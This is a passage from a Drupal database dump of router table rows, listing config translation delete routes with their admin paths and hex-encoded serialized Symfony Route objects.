73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.pathauto_pattern.edit_form', '/admin/config/search/path/patterns/{pathauto_pattern}/translate/{langcode}/delete', '/admin/config/search/path/patterns/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38313a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f7b706174686175746f5f7061747465726e7d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31363a22706174686175746f5f7061747465726e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31363a22706174686175746f5f7061747465726e223b613a323a7b733a343a2274797065223b733a32333a22656e746974793a706174686175746f5f7061747465726e223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130383a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f283f503c706174686175746f5f7061747465726e3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31363a22706174686175746f5f7061747465726e223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33343a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e73223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31363a22706174686175746f5f7061747465726e223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f636f6e6669672f7365617263682f706174682f7061747465726e732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.search_page.edit_form', '/admin/config/search/pages/manage/{search_page}/translate/{langcode}/delete', '/admin/config/search/pages/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37353a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31313a227365617263685f70616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130323a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a227365617263685f70616765223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35343a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.shortcut_set.edit_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/translate/{langcode}/delete', '/admin/config/user-interface/shortcut/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31323a2273686f72746375745f736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36353a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.taxonomy_vocabulary.edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/translate/{langcode}/delete', '/admin/structure/taxonomy/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130393a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.user.admin_form', '/admin/config/people/accounts/translate/{langcode}/delete', '/admin/config/people/accounts/translate/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35373a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32323a22656e746974792e757365722e61646d696e5f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.delete.entity.user_role.edit_form', '/admin/people/roles/manage/{user_role}/translate/{langcode}/delete', '/admin/people/roles/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a393a22757365725f726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39333a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.view.edit_form', '/admin/structure/views/view/{view}/translate/{langcode}/delete', '/admin/structure/views/view/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36323a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a343a2276696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f7374727563747572652f76696577732f766965772f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.system.rss_feeds_settings', '/admin/config/services/rss-publishing/translate/{langcode}/delete', '/admin/config/services/rss-publishing/translate/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32353a2273797374656d2e7273735f66656564735f73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38333a227b5e2f61646d696e2f636f6e6669672f73657276696365732f7273735c2d7075626c697368696e672f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.delete.system.site_information_settings', '/admin/config/system/site-information/translate/{langcode}/delete', '/admin/config/system/site-information/translate/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a33323a2273797374656d2e736974655f696e666f726d6174696f6e5f73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38333a227b5e2f61646d696e2f636f6e6669672f73797374656d2f736974655c2d696e666f726d6174696f6e2f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b